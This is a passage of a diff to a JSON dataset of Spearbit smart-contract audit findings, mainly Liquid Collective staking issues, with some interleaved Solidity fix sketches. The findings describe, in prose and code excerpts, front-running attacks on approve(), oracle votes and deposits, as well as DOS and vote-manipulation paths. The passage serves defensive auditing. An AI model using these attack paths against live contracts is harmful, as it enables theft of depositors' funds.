Unless there is a plan to use the bytes memory preTransferState in some other form as well.", + "title": "Simplifying code logic", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Locke-Spearbit-Security-Review.pdf", + "body": "if (timestamp < lastUpdate) { return tokens; } uint32 acctTimeDelta = timestamp - lastUpdate; if (acctTimeDelta > 0) { uint256 streamAmt = uint256(acctTimeDelta) * tokens / (endStream - lastUpdate); return tokens - uint112(streamAmt); } else { return tokens; } function currDepositTokensNotYetStreamed(IStream stream, address who) external view returns (uint256) { unchecked { uint32 timestamp = uint32(block.timestamp); (uint32 startTime, uint32 endStream, ,) = stream.streamParams(); if (block.timestamp >= endStream) return 0; ( uint256 lastCumulativeRewardPerToken, uint256 virtualBalance, uint112 rewards, uint112 tokens, uint32 lastUpdate, bool merkleAccess ) = stream.tokenStreamForAccount(address(who)); if (timestamp < lastUpdate) { return tokens; } uint32 acctTimeDelta = timestamp - lastUpdate; if (acctTimeDelta > 0) { uint256 streamAmt = uint256(acctTimeDelta) * tokens / (endStream - lastUpdate); return tokens - uint112(streamAmt); } else { return tokens; } } }", "labels": [ "Spearbit", - "Astaria", - "Severity: Gas Optimization" + "Locke", + "Severity: Informational" ] }, { - "title": "Define an endpoint for LienToken that only returns the liquidator", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "It would save a lot of gas if LienToken had an endpoint that would only return the liquidator for a collateralId, instead of all the auction data.", + "title": "Operators._hasFundableKeys returns true for operators that do not have fundable keys", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "Because _hasFundableKeys uses operator.stopped in the check, an operator without fundable keys can be validated and return true. Scenario: Op1 has keys = 10 limit = 10 funded = 10 stopped = 10 This means that all the keys got funded, but also \"exited\". Because of how _hasFundableKeys is made, when you call _hasFundableKeys(op1) it will return true even if the operator does not have keys available to be funded. By returning true, the operator gets wrongly included in the array returned by getAllFundable. That function is critical because it is the one used by pickNextValidators, which picks the next validators to be selected and stakes users' delegated ETH. Because of this issue in _hasFundableKeys, the issue OperatorsRegistry._getNextValidatorsFromActiveOperators can DOS Alluvial staking if there's an operator with funded==stopped and funded == min(limit, keys) can also happen, DOSing the contract so that pickNextValidators will always return empty. Check the Appendix for a test case to reproduce this issue.", "labels": [ "Spearbit", - "Astaria", - "Severity: Gas Optimization" + "LiquidCollective", + "Severity: Critical Risk" ] }, { - "title": "Setting uninitialized stack variables to their default value can be avoided.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "Setting uninitialized stack variables to their default value adds extra gas overhead.
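One way the fundable-keys predicate could be written so that stopped plays no role, in line with the _hasFundableKeys finding above; the struct layout and names are assumptions, not Liquid Collective code:

pragma solidity ^0.8.0;

library FundableKeysSketch {
    struct Operator {
        bool active;
        uint256 limit;
        uint256 funded;
        uint256 stopped;
        uint256 keys;
    }

    // An operator is fundable iff it still has approved, not-yet-funded keys;
    // `stopped` says nothing about what is left to fund and is ignored here.
    function hasFundableKeys(Operator memory op) internal pure returns (bool) {
        uint256 approved = op.keys < op.limit ? op.keys : op.limit;
        return op.active && approved > op.funded;
    }
}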
T t = ;", + "title": "OperatorsRegistry._getNextValidatorsFromActiveOperators can DOS Alluvial staking if there's an operator with funded==stopped and funded == min(limit, keys)", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "This issue is also related to OperatorsRegistry._getNextValidatorsFromActiveOperators should not consider stopped when picking a validator. Consider a scenario where we have Op at index 0 name op1 active true limit 10 funded 10 stopped 10 keys 10 Op at index 1 name op2 active true limit 10 funded 0 stopped 0 keys 10 In this case, Op1 got all 10 keys funded and exited. Because it has keys=10 and limit=10 it means that it has no more keys to get funded again. Op2 instead still has 10 approved keys to be funded. Because of how the selection of the picked validator works uint256 selectedOperatorIndex = 0; for (uint256 idx = 1; idx < operators.length;) { if ( operators[idx].funded - operators[idx].stopped < operators[selectedOperatorIndex].funded - operators[selectedOperatorIndex].stopped ) { selectedOperatorIndex = idx; } unchecked { ++idx; } } When the function finds an operator with funded == stopped it will pick that operator because 0 < operators[selectedOperatorIndex].funded - operators[selectedOperatorIndex].stopped. After the loop ends, selectedOperatorIndex will be the index of an operator that has no more validators to be funded (for this scenario). Because of this, the following code uint256 selectedOperatorAvailableKeys = Uint256Lib.min( operators[selectedOperatorIndex].keys, operators[selectedOperatorIndex].limit ) - operators[selectedOperatorIndex].funded; when executed on Op1 it will set selectedOperatorAvailableKeys = 0 and as a result, the function will execute return (new bytes[](0), new bytes[](0));. In this scenario, when stopped==funded and there are no keys available to be funded (funded == min(limit, keys)) the function will always return an empty result, breaking the pickNextValidators mechanism that won't be able to stake users' deposited ETH anymore even if there are operators with fundable validators. Check the Appendix for a test case to reproduce this issue.", "labels": [ "Spearbit", - "Astaria", - "Severity: Gas Optimization" + "LiquidCollective", + "Severity: Critical Risk" ] }, { - "title": "Simplify / optimize for loops", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "In the codebase, sometimes there are for loops of the form: for (uint256 i = 0; ; i++) { } These for loops can be optimized.", + "title": "Oracle.removeMember could, in the same epoch, allow members to vote multiple times and other members to not vote at all", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "The current implementation of removeMember introduces an exploit that allows an oracle member to vote again and again (in the same epoch) while an oracle member that has never voted is prevented from voting (in the same epoch). Because of how OracleMembers.deleteItem is implemented, it will swap the last item of the array with the one that will be deleted and pop the last element. Let's make an example: 1) At T0 m0 is added to the list of members members[0] = m0. 2) At T1 m1 is added to the list of members members[1] = m1. 3) At T3 m0 calls reportBeacon(...).
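For the DOS scenario above, a sketch of a selection rule that ranks operators by approved-but-unfunded keys instead of funded - stopped, so an exhausted operator can never win the scan; names and struct layout are assumptions:

pragma solidity ^0.8.0;

library PickOperatorSketch {
    struct Operator { bool active; uint256 limit; uint256 funded; uint256 stopped; uint256 keys; }

    // Pick the operator with the most approved-but-unfunded keys. An exhausted
    // operator (funded == min(keys, limit)) always scores 0 and is never chosen.
    function pick(Operator[] memory ops) internal pure returns (uint256 idx, uint256 available) {
        for (uint256 i = 0; i < ops.length; ++i) {
            uint256 approved = ops[i].keys < ops[i].limit ? ops[i].keys : ops[i].limit;
            uint256 avail = approved > ops[i].funded ? approved - ops[i].funded : 0;
            if (ops[i].active && avail > available) {
                (idx, available) = (i, avail);
            }
        }
        // available == 0 after the loop means nothing is fundable at all;
        // only then should the caller return empty arrays.
    }
}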
By doing that, ReportsPositions.register(uint256(0)); will be called, registering that the member at index 0 has cast its vote. 4) At T4, the oracle admin calls removeMember(m0). This operation, as we said, will swap the member's address from the last position of the array of members with the position of the member that will be deleted, and then pop the last position of the array. The state changes from members[0] = m0; members[1] = m1 to members[0] = m1;. At this point, the oracle member m1 will not be able to vote during this epoch because when they call reportBeacon(...) the function will enter the check. if (ReportsPositions.get(uint256(memberIndex))) { revert AlreadyReported(_epochId, msg.sender); } This is because int256 memberIndex = OracleMembers.indexOf(msg.sender); will return 0 (the position of the m0 member that has already voted) and ReportsPositions.get(uint256(0)) will return true. At this point, if for whatever reason an admin of the contract adds the deleted oracle again, it would be added at position 1 of the members array, allowing the same member that has already voted to vote again. Note: while the scenario where a removed member can vote multiple times would involve a corrupted admin (that would re-add the same member), the second scenario, which prevents a member from voting, would be more common. Check the Appendix for a test case to reproduce this issue.", "labels": [ "Spearbit", - "Astaria", - "Severity: Gas Optimization" + "LiquidCollective", + "Severity: High Risk" ] }, { - "title": "calculateSlope can be more simplified", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "calculateSlope can be more simplified: owedAtEnd would be: owedAtEnd = amt + (tend (cid:0) tlast )r amt 1018 where: amt is stack.point.amount tend is stack.point.end tlast is stack.point.last r is stack.lien.details.rate and so the returned value would need to be r amt 1018.", + "title": "Order of calls to removeValidators can affect the resulting validator keys set", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "If two entities A and B (which can be either the admin or the operator O with the index I) send a call to removeValidators with 2 different sets of parameters: T1 : (I, R1) T2 : (I, R2) Then, depending on the order of transactions, the resulting set of validators for this operator might be different. And since either party might not know a priori if any other transaction is going to be included on the blockchain after they submit their transaction, they don't have a 100 percent guarantee that their intended set of validator keys is going to be removed.
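A sketch of one possible fix direction for the removeMember finding above: invalidate the per-index vote state whenever the member array is reshuffled. All helpers here are hypothetical stand-ins for the Oracle's internals, and access control is elided:

pragma solidity ^0.8.0;

abstract contract RemoveMemberSketch {
    error NotAMember();

    function _indexOf(address member) internal view virtual returns (int256);
    function _deleteItem(uint256 index) internal virtual;
    function _clearReports() internal virtual; // hypothetical: wipes all per-index vote bits

    // Wiping the per-index report bitmap on every membership change keeps the
    // swap-and-pop index reshuffle from crediting one member with another's vote.
    function removeMember(address member) external {
        int256 index = _indexOf(member);
        if (index < 0) revert NotAMember();
        _deleteItem(uint256(index));
        _clearReports();
    }
}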
This also opens an opportunity for either party to DoS the other party's transaction by frontrunning it with a call to remove enough validator keys to trigger the InvalidIndexOutOfBounds error: OperatorsRegistry.1.sol#L324-L326: if (keyIndex >= operator.keys) { revert InvalidIndexOutOfBounds(); }", "labels": [ "Spearbit", - "Astaria", - "Severity: Gas Optimization" + "LiquidCollective", + "Severity: High Risk" ] }, { - "title": "Break out of _makePayment for loop early when totalCapitalAvailable reaches 0", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "In _makePayment we have the following for loop: for (uint256 i; i < n; ) { (newStack, spent) = _payment( s, stack, uint8(i), totalCapitalAvailable, address(msg.sender) ); totalCapitalAvailable -= spent; unchecked { ++i; } } When totalCapitalAvailable reaches 0 we still call _payment which costs a lot of gas and it is only used for transferring 0 assets, removing and adding the same slope for a lien owner if it is a public vault and other noops.", + "title": "Non-zero operator.limit should always be greater than or equal to operator.funded", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "For the subtraction operation in OperatorsRegistry.1.sol#L428-L430 to not underflow and revert, there should be an assumption that operators[selectedOperatorIndex].limit >= operators[selectedOperatorIndex].funded. Perhaps this is a general assumption, but it is not enforced when setOperatorLimits is called with a new set of limits.", "labels": [ "Spearbit", - "Astaria", - "Severity: Gas Optimization" + "LiquidCollective", + "Severity: High Risk" ] }, { - "title": "_buyoutLien can be optimized by reusing payee", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "payee in _buyoutLien can be reused to save some gas", + "title": "Decrementing the quorum in Oracle in some scenarios can open up a frontrunning/backrunning opportunity for some oracle members", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "Assume there are 2 groups of oracle members A, B where they have voted for report variants Va and Vb respectively. Let's also assume the counts for these variants Ca and Cb are equal and are the highest variant vote counts among all possible variants. If the Oracle admin changes the quorum to a number less than or equal to Ca + 1 = Cb + 1, any oracle member can backrun this transaction by the admin to decide which report variant Va or Vb gets pushed to the River. This is because when a lower quorum is submitted by the admin and there exist two variants that have the highest number of votes, in the _getQuorumReport function the returned isQuorum parameter would be false since repeat == 0 is false: Oracle.1.sol#L369: return (maxval >= _quorum && repeat == 0, variants[maxind]); Note that this issue also exists in the commit hash 030b52feb5af2dd2ad23da0d512c5b0e55eb8259 and can be triggered by the admin either by calling setQuorum or addMember when the abovementioned conditions are met. Also, note that the free oracle member agent can frontrun the admin transaction to decide the quorum earlier in the scenario above.
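For the limit >= funded finding above, a sketch of enforcing the invariant at the only place limits change; the helper names and the zero-limit exemption are assumptions:

pragma solidity ^0.8.0;

abstract contract OperatorLimitsSketch {
    error LimitBelowFunded(uint256 operatorIndex);

    function _funded(uint256 operatorIndex) internal view virtual returns (uint256);
    function _setLimit(uint256 operatorIndex, uint256 limit) internal virtual;

    // Rejecting non-zero limits below `funded` here means a later
    // min(keys, limit) - funded computation can never underflow.
    function setOperatorLimits(uint256[] calldata indexes, uint256[] calldata limits) external {
        require(indexes.length == limits.length);
        for (uint256 i = 0; i < indexes.length; ++i) {
            if (limits[i] != 0 && limits[i] < _funded(indexes[i])) {
                revert LimitBelowFunded(indexes[i]);
            }
            _setLimit(indexes[i], limits[i]);
        }
    }
}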
Thus, this way _getQuorumReport would actually return that it is a quorum.", "labels": [ "Spearbit", - "Astaria", - "Severity: Gas Optimization" + "LiquidCollective", + "Severity: Medium Risk" ] }, { - "title": "isValidRefinance and related storage parameters can be moved to LienToken", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "isValidRefinance is only used in LienToken and with the current implementation it requires reading AstariaRouter from the storage and performing a cross-contract call which would add a lot of overhead gas cost.", + "title": "_getNextValidatorsFromActiveOperators can be tweaked to find an operator with a better validator pool", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "Assume for an operator: (A, B) = (funded - stopped, limit - funded) The current algorithm finds the first index in the cached operators array with the minimum value for A and tries to gather as many publicKeys and signatures from this operator's validators up to a max of _requestedAmount. But there is also the B cap for this amount. And if B is zero, the function returns early with empty arrays. Even though there could be other approved and non-funded validators from other operators. Related: OperatorsRegistry._getNextValidatorsFromActiveOperators should not consider stopped when picking a validator, OperatorsRegistry._getNextValidatorsFromActiveOperators can DOS Alluvial staking if there's an operator with funded==stopped and funded == min(limit, keys), _hasFundableKeys marks operators that have no more fundable validators as fundable.", "labels": [ "Spearbit", - "Astaria", - "Severity: Gas Optimization" + "LiquidCollective", + "Severity: Medium Risk" ] }, { - "title": "auctionWindowMax can be reused to optimize liquidate", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "There are mutiple instances of s.auctionWindow + s.auctionWindowBuffer in the liquidate func- tion which would make the function to read from the storage twice each time. Also there is already a stack variable auctionWindowMax defined as the sum which can be reused.", + "title": "Dust might be trapped in WlsETH when burning one's balance.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "It is not possible to burn the exact amount of minted/deposited lsETH back because the _value provided to burn is in ETH. Assume we've called mint(r, v) with our address r; then to get the v lsETH back to our address, we need to find an x where v = floor(x * S / B) and call burn(r, x) (here S represents the total shares of lsETH and B the total underlying value). It's not always possible to find the exact x. So there will always be an amount locked in this contract (v - floor(x * S / B)). These dust amounts can accumulate from different users and turn into a big number. To get the full amount back, the user needs to mint more wlsETH tokens so that we can find an exact solution to v = floor(x * S / B). The extra amount to get the locked-up fees back can be engineered. The same problem exists for transfer and transferFrom. Also note, if you have minted x amount of shares, balanceOf would tell you that you own b = floor(x * B / S) wlsETH. Internally wlsETH keeps track of the shares x.
So users think they can only burn b amount, plug that in for the _value, and in this case the number of shares burnt would be floor(floor(x * B / S) * S / B), which has even more rounding errors. wlsETH could internally track the underlying, but then it would not appreciate in value like lsETH; it would basically be a kind of wETH. We think the issue of not being able to transfer your full amount of shares is not as serious as not being able to burn back your shares into lsETH. On the same note, we think it would be beneficial to expose the wlsETH share amount to the end user: function sharesBalanceOf(address _owner) external view returns (uint256 shares) { return BalanceOf.get(_owner); }", "labels": [ "Spearbit", - "Astaria", - "Severity: Gas Optimization" + "LiquidCollective", + "Severity: Medium Risk" ] }, { - "title": "fileBatch() does requiresAuth for each file separately", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "fileBatch() does a requiresAuth check and then for each element in the input array calls file() which does another requiresAuth check. function fileBatch(File[] calldata files) external requiresAuth { for (uint256 i = 0; i < files.length; i++) { file(files[i]); } } ... function file(File calldata incoming) public requiresAuth { This wastes gas as if the fileBatch()'s requiresAuth pass, file()'s check will pass too.", + "title": "BytesLib.concat can potentially return results with dirty byte paddings.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "concat does not clean the potential dirty bytes that might have been copied from _postBytes (nor does it clean the padding). The dirty bytes from _postBytes are carried over to the padding for tempBytes.", "labels": [ "Spearbit", - "Astaria", - "Severity: Gas Optimization" + "LiquidCollective", + "Severity: Medium Risk" ] }, { - "title": "_sliceUint can be optimized", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "_sliceUint can be optimized", + "title": "The reportBeacon is prone to front-running attacks by oracle members", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "There could be a situation where the oracle members are segmented into 2 groups A and B, and members of the group A have voted for the report variant Va and the group B for Vb. Also, let's assume these two variants are 1 vote short of quorum. Then either group can try to front-run the other to push their submitted variant to River.", "labels": [ "Spearbit", - "Astaria", - "Severity: Gas Optimization" + "LiquidCollective", + "Severity: Medium Risk" ] }, { - "title": "Use basis points for ratios", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "Fee ratios are represented through two state variables for numerator and denominator.
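For the operator-reward rounding finding that follows (division before multiplication in _rewardOperators), the usual fix is to multiply before dividing, per operator; a sketch under assumed signatures, with totalActiveValidators > 0 taken as a precondition:

pragma solidity ^0.8.0;

abstract contract RewardSharesSketch {
    function _mintRawShares(address recipient, uint256 shares) internal virtual;

    // Multiplying before dividing keeps the per-operator truncation to at most
    // 1 wei of shares, instead of up to totalActiveValidators - 1 per operator.
    function _rewardOperators(
        uint256 reward,
        address[] memory feeRecipients,
        uint256[] memory validatorCounts,
        uint256 totalActiveValidators // assumed non-zero by the caller
    ) internal {
        for (uint256 i = 0; i < feeRecipients.length; ++i) {
            _mintRawShares(feeRecipients[i], (reward * validatorCounts[i]) / totalActiveValidators);
        }
    }
}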
Basis point system can be used in its place as it is simpler (denominator always set to 10_000), and gas efficient as denomi- nator is now a constant.", + "title": "Shares distributed to operators suffer from rounding error", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "_rewardOperators distributes a portion of the overall shares distributed to operators based on the number of active and funded validators that each operator has. The current number of shares distributed to a validator is calculated by the following code _mintRawShares(operators[idx].feeRecipient, validatorCounts[idx] * rewardsPerActiveValidator); where rewardsPerActiveValidator is calculated as uint256 rewardsPerActiveValidator = _reward / totalActiveValidators; This means that in reality each operator receives validatorCounts[idx] * (_reward / totalActiveValidators) shares. Such share calculation suffers from a rounding error caused by division before multiplication.", "labels": [ "Spearbit", - "Astaria", - "Severity: Gas Optimization" + "LiquidCollective", + "Severity: Medium Risk" ] }, { - "title": "No Need to Allocate Unused Variable", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "LienToken._makePayment() returns two values: (Stack[] memory newStack, uint256 spent), but the second value is never read: (newStack, ) = _makePayment(_loadLienStorageSlot(), stack, amount); Also, if this value is planned to be used in future, it's not a useful value. It is equal to the payment made to the last lien. A more meaningful quantity can be the total payment made to the entire stack. Additional instances noted in Context above.", + "title": "OperatorsRegistry._getNextValidatorsFromActiveOperators should not consider stopped when picking a validator", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "Note that: limit = the number of validators (already pushed by the operator) that have been approved by Alluvial and can be selected to be funded; funded = the number of validators funded; stopped = the number of validators exited (they were funded at some point but for some reason have exited staking). The implementation of the function should favor operators that have the highest number of available validators to be funded. Nevertheless, the function favors operators whose stopped value is near their funded value. Consider the following example: Op at index 0 name op1 active true limit 10 funded 5 stopped 5 keys 10 Op at index 1 name op2 active true limit 10 funded 0 stopped 0 keys 10 1) op1 and op2 have 10 validators whitelisted. 2) op1 at time1 gets 5 validators funded. 3) op1 at time2 gets those 5 validators exited; this means that op.stopped == 5. In this scenario, those 5 validators would not be used because they are \"blacklisted\". At this point op1 has 5 validators that can be funded. op2 has 10 validators that can be funded. pickNextValidators logic should favor operators that have the highest number of available keys (not funded but approved) to be funded. If we run operatorsRegistry.pickNextValidators(5); the result is this: Op at index 0 name op1 active true limit 10 funded 10 stopped 5 keys 10 Op at index 1 name op2 active true limit 10 funded 0 stopped 0 keys 10 Op1 gets all of its remaining 5 validators funded; per the specification of the logic, the function should instead have picked Op2.
Check the Appendix for a test case to reproduce this issue.", "labels": [ "Spearbit", - "Astaria", - "Severity: Gas Optimization" + "LiquidCollective", + "Severity: Medium Risk" ] }, { - "title": "Cache Values to Save Gas", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "Calls are occurring, same values are computed, or storage variables are being read, multiple times; e.g. CollateralToken.sol#L286-L307 reads the storage variable s.securityHooks[addr] four times. It's better to cache the result in a stack variable to save gas.", + "title": "approve() function can be front-run, resulting in token theft", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "The approve() function has a known race condition that can lead to token theft. If a user calls the approve function a second time on a spender that was already allowed, the spender can front-run the transaction and call transferFrom() to transfer the previous value and still receive the authorization to transfer the new value.", "labels": [ "Spearbit", - "Astaria", - "Severity: Gas Optimization" + "LiquidCollective", + "Severity: Medium Risk" ] }, { - "title": "RouterStorage.vaults can be a boolean mapping", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "RouterStorage.vaults is of type mapping(address => address). A key-value is stored in the mapping as: s.vaults[vaultAddr] = msg.sender; However, values in this mapping are only used to compare against address(0): if (_loadRouterSlot().vaults[msg.sender] == address(0)) { ... return _loadRouterSlot().vaults[vault] != address(0); It's better to have vaults as a boolean mapping as the assignment of msg.sender as value doesn't carry a special meaning.", + "title": "Add missing input validation on constructor/initializer/setters", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "Allowlist.1.sol initAllowlistV1 should require the _admin parameter to be not equal to address(0). This check is not needed if issue LibOwnable._setAdmin allows setting address(0) as the admin of the contract is implemented directly at LibOwnable._setAdmin level. allow should check _accounts[i] to be not equal to address(0). Firewall.sol constructor should check that: governor_ != address(0). executor_ != address(0). destination_ != address(0). setGovernor should check that newGovernor != address(0). setExecutor should check that newExecutor != address(0). OperatorsRegistry.1.sol initOperatorsRegistryV1 should require the _admin parameter to be not equal to address(0). This check is not needed if issue LibOwnable._setAdmin allows setting address(0) as the admin of the contract is implemented directly at LibOwnable._setAdmin level. addOperator should check: _name to not be an empty string. _operator to not be address(0). _feeRecipient to not be address(0). setOperatorAddress should check that _newOperatorAddress is not address(0). setOperatorFeeRecipientAddress should check that _newOperatorFeeRecipientAddress is not address(0). setOperatorName should check that _newName is not an empty string. Oracle.1.sol initOracleV1 should require the _admin parameter to be not equal to address(0).
This check is not needed if the fix for the issue \"LibOwnable._setAdmin allows setting address(0) as the admin of the contract\" is implemented directly at the LibOwnable._setAdmin level. Consider also adding some min and max limits to the values of _annualAprUpperBound and _relativeLowerBound, and be sure that _epochsPerFrame, _slotsPerEpoch, _secondsPerSlot and _genesisTime match the values expected. addMember should check that _newOracleMember is not address(0). setBeaconBounds: Consider adding min/max values that _annualAprUpperBound and _relativeLowerBound should respect. River.1.sol initRiverV1: _globalFee should follow the same validation done in setGlobalFee. Note that the client said that 0 is a valid _globalFee value: \"The revenue redistribution would be computed off-chain and paid by the treasury in that case. It's still an on-going discussion they're having at Alluvial.\" _operatorRewardsShare should follow the same validation done in setOperatorRewardsShare. Note that the client said that 0 is a valid _operatorRewardsShare value: \"The revenue redistribution would be computed off-chain and paid by the treasury in that case. It's still an on-going discussion they're having at Alluvial.\" ConsensusLayerDepositManager.1.sol initConsensusLayerDepositManagerV1: _withdrawalCredentials should not be empty and follow the requirements expressed in the official Consensus Specs document.", "labels": [ "Spearbit", - "Astaria", - "Severity: Gas Optimization" + "LiquidCollective", + "Severity: Medium Risk" ] }, { - "title": "isValidReference() should just take an array element as input", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "stack[position]: isValidRefinance() takes stack array as an argument but only uses stack[0] and function isValidRefinance( ILienToken.Lien calldata newLien, uint8 position, ILienToken.Stack[] calldata stack ) public view returns (bool) { The usage of stack[0] can be replaced with stack[position] as stack[0].lien.collateralId == stack[position].lien.collateralId: if (newLien.collateralId != stack[0].lien.collateralId) { revert InvalidRefinanceCollateral(newLien.collateralId); } To save gas, it can directly take that one element as input.", + "title": "LibOwnable._setAdmin allows setting address(0) as the admin of the contract", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "While other contracts like RiverAddress (for example) do not allow address(0) to be used as the set input parameter, there is no similar check inside LibOwnable._setAdmin. Because of this, contracts that call LibOwnable._setAdmin with address(0) will not revert, and functions that should be callable by an admin can no longer be called.
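A minimal sketch of the guard this finding asks for, assuming a hypothetical unstructured-storage layout (the real LibOwnable slot derivation may differ):

pragma solidity ^0.8.10;

library LibOwnableSketch {
    error InvalidZeroAddress();

    struct AdminStorage { address admin; }

    // Hypothetical slot accessor, mirroring the project's storage-library style.
    function _adminStorage() private pure returns (AdminStorage storage s) {
        bytes32 slot = bytes32(uint256(keccak256("river.state.admin")) - 1);
        assembly { s.slot := slot }
    }

    function _setAdmin(address admin) internal {
        // A single guard here protects every consumer at one choke point.
        if (admin == address(0)) revert InvalidZeroAddress();
        _adminStorage().admin = admin;
    }
}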
This is the list of contracts that import and use the LibOwnable library: AllowlistV1, OperatorsRegistryV1, OracleV1, RiverV1", "labels": [ "Spearbit", - "Astaria", - "Severity: Gas Optimization" + "LiquidCollective", + "Severity: Medium Risk" ] }, { - "title": "Functions can be made external", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "If public function is not called from within the contract, it should made external for clarity, and can potentially save gas.", + "title": "OracleV1.getMemberReportStatus returns true for non-existing oracles", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "memberIndex will be equal to -1 for non-existing oracles, which will cause the mask to be equal to 0, which will cause the function to return true for non-existing oracles.", "labels": [ "Spearbit", - "Astaria", - "Severity: Gas Optimization" + "LiquidCollective", + "Severity: Medium Risk" ] }, { - "title": "a.mulDivDown(b,1) is equivalent to a*b", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "Highlighted code above follow the pattern of a.mulDivDown(b, 1) which is equivalent to a*b.", + "title": "Operators might add the same validator more than once", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "Operators can use OperatorsRegistryV1.addValidators to add the same validator more than once. Depositors' funds will be directed to these duplicated addresses, which, in turn, will end up having more than 32 ETH. This act will damage the capital efficiency of the entire deposit pool and thus will potentially impact the pool's APY.", "labels": [ "Spearbit", - "Astaria", - "Severity: Gas Optimization" + "LiquidCollective", + "Severity: Medium Risk" ] }, { - "title": "Use scratch space for keccak", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "computeId() function computes and returns uint256(keccak256(abi.encodePacked(token, to- kenId))). Since the data being hashed fits within 2 memory slots, scratch space can be used to avoid paying gas cost on memory expansion.", + "title": "OracleManager.setBeaconData possible front running attacks", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "The system is designed in a way that depositors receive shares (lsETH) in return for their ETH deposit. A share represents a fraction of the total ETH balance of the system at a given time. Investors can claim their staking profits by withdrawing once withdrawals are active in the system. Profits are pulled from the ELFeeRecipient to the River contract when the oracle calls OracleManager.setBeaconData. setBeaconData updates BeaconValidatorBalanceSum, which might be increased or decreased (as a result of slashing, for instance). Investors have the ability to time their position in two main ways: Investors might time their deposit just before profits are being distributed, thus harvesting profits made by others. Investors might time their withdrawal / sell lsETH on secondary markets just before the loss is realized.
By doing this, they will effectively avoid the loss, escaping the intended mechanism of socializing losses.", "labels": [ "Spearbit", - "Astaria", - "Severity: Gas Optimization" + "LiquidCollective", + "Severity: Medium Risk" ] }, { - "title": "Define a named constant for the return value of onFlashAction", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "onFlashAction returns: keccak256(\"FlashAction.onFlashAction\")", + "title": "SharesManager._mintShares - Depositors may receive zero shares due to front-running", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "The number of shares minted to a depositor is determined by (_underlyingAssetValue * _totalSupply()) / oldTotalAssetBalance. Potential attackers can spot a call to UserDepositManagerV1._deposit and front-run it with a transaction that sends wei to the contract (by self-destructing another contract and sending the funds to it), causing the victim to receive fewer shares than expected. More specifically, in case oldTotalAssetBalance() is greater than _underlyingAssetValue * _totalSupply(), the number of shares the depositor receives will be 0, although _underlyingAssetValue will still be pulled from the depositor's balance. An attacker with access to enough liquidity and to the mempool data can spot a call to UserDepositManagerV1._deposit and front-run it by sending at least totalSupplyBefore * 